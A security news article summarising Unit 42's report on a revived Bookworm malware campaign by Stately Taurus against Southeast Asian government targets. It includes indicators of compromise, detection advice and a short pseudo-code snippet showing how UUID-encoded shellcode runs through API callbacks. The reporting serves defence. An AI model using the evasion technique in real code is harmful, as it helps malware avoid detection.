Security researchers at Palo Alto Networks’ Unit 42 have uncovered a resurgence of the modular Bookworm malware in cyberattacks targeting government and diplomatic entities across Southeast Asia.
The activity, attributed to the Chinese state-aligned threat actor Stately Taurus (also tracked as Mustang Panda), demonstrates the group’s continued evolution of decades-old espionage tools paired with novel delivery methods.
The campaign leverages a revamped version of Bookworm, a Trojan first documented in 2015, which now incorporates shellcode-based payloads delivered via malicious archive files.
Analysts at Palo Alto Networks’ Unit 42 detected that these files, often disguised as policy documents or meeting agendas (“analysis of the third meeting of ndsc.zip”), deploy a loader called PubLoad that mimics Microsoft Windows Update traffic to bypass network detection.
Bookworm’s Delivery Mechanism
The latest Bookworm variant utilizes a multi-stage shellcode execution process designed to evade static analysis.
Attackers embed shellcode within Universal Unique Identifiers (UUIDs) stored either as plain ASCII strings or Base64-encoded blobs.
During execution, the malware converts these UUIDs into binary shellcode using the Windows API function UuidFromStringA, allocates memory via HeapCreate, and executes the payload through callback functions of legitimate APIs like EnumChildWindows or EnumSystemLanguageGroupsA.
This technique, adapted from publicly available exploit code, enables runtime flexibility while avoiding signature-based detection.
// Pseudo-code of shellcode execution flow (simplified):
LPVOID buffer = HeapAlloc(heap, HEAP_ZERO_MEMORY, size);
UuidFromStringA((char*)uuid_str, (UUID*)buffer);
EnumChildWindows(NULL, (WNDENUMPROC)buffer, 0); // Triggers shellcode execution The malware’s command-and-control (C2) infrastructure employs HTTPS POST requests to domains such as www.fjke5oe[.]com, masquerading as Microsoft update servers.
A sample request (Figure 1) shows the URL path /v11/2/windowsupdate/redir/v6-winsp1-wuredir—a subtle deviation from legitimate Windows Update endpoints like /v6-win7sp1-wuredir.cab.
This domain resolved to the IP 103.27.202[.]68, which previously hosted C2 servers for ToneShell, another Stately Taurus-linked backdoor.
Contemporary Bookworm samples retain the core modular architecture observed in earlier versions but with critical updates.
The Leader.dll module now dynamically initializes components like Resolver.dll (renamed to dafdsafdsaa3) and AES.dll (unchanged), while deprecated modules like Mover.dll are replaced with heap-based payload relocation.
Debug paths such as C:UsershackDocumentsWhiteFileLTDIS13nReleaseLTDIS13n.pdb directly tie the malware to Stately Taurus developers, mirroring artifacts found in ToneShell variants.
Unit 42 emphasizes Southeast Asia’s geopolitical significance as the primary driver of these attacks, particularly targeting ASEAN-affiliated entities.
.webp)
Palo Alto Networks recommends deploying behavioral analytics tools like Cortex XDR to detect API-based shellcode triggers and monitoring for anomalous HTTP patterns resembling Microsoft services.
As regional tensions escalate, Stately Taurus’ ability to modernize legacy malware like Bookworm underscores the persistent threat posed by state-sponsored adversaries to governmental networks worldwide.
Security teams must prioritize anomaly detection in API usage and network traffic to counter these adaptive tactics.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here